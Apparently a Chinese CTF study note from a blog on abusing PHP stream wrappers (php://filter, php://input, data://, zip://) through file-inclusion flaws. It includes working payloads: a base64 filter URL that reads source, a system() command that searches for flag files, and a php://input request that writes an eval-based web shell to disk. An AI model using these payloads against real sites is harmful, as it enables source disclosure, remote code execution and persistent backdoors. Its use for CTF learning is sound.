php协议类型
file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
1.php伪协议:
需要开启allow_url_fopen的: php://input、php://stdin、php://memory和php://temp
不需要开启allow_wrl_fopen的: php://filter
在CTF中经常使用的是php://filter和php://input
php://filter用于读取源码 php://input用于执行php代码
php://input需要post请求提交数据
php://filter可以get提交?a=php://filter/read=convert.base64-encode/resource=xxx.php
convert.*过滤器
支持convert.iconv.* 格式,使用方法:
convert.iconv.<input-encoding>.<output-encoding>
或
convert.iconv.<input-encoding>/<output-encoding>
例如:
convert.iconv.UCS-4*.UCS-4BE ---> 将指定的文件从UCS-4*转换为UCS-4BE 输出
?filename=php://filter/convert.iconv.a.b/resource=check.php (a,b 位置是编码格式)
2.data协议
php5.2.0起,数据流封装器开始有效,主要用于数据流的读取。如果传入的数据是PHP代码,就会执行代码
使用方法:data://text/plain;base64,xxxx(base64编码后的数据)
data伪协议只有在php<5.3且include=on时可以写木马。
3.file协议
file://用于访问本地文件系统
用法: file://[文件的绝对路径和文件名]
#<?php system('find / -name flag*'); ?>
4.zip协议
封装伪协议命令如下:
?cmd=zip://D:\phpstudy\WWW\txt.zip%23zip.txt
前面是zip文件 后面是zip中的文件
5.input写马
GET /include.php?cmd=php://input HTTP/1.1 (数据包头部)
请求体中增加一句马
<?php fwrite(fopen('exp.php','w'),'<?php eval($_POST[shell]);?>');?>
标签:Web,convert,协议,iconv,filter,CTF,input,php
From: https://www.cnblogs.com/Tzyyyyy/p/17584802.html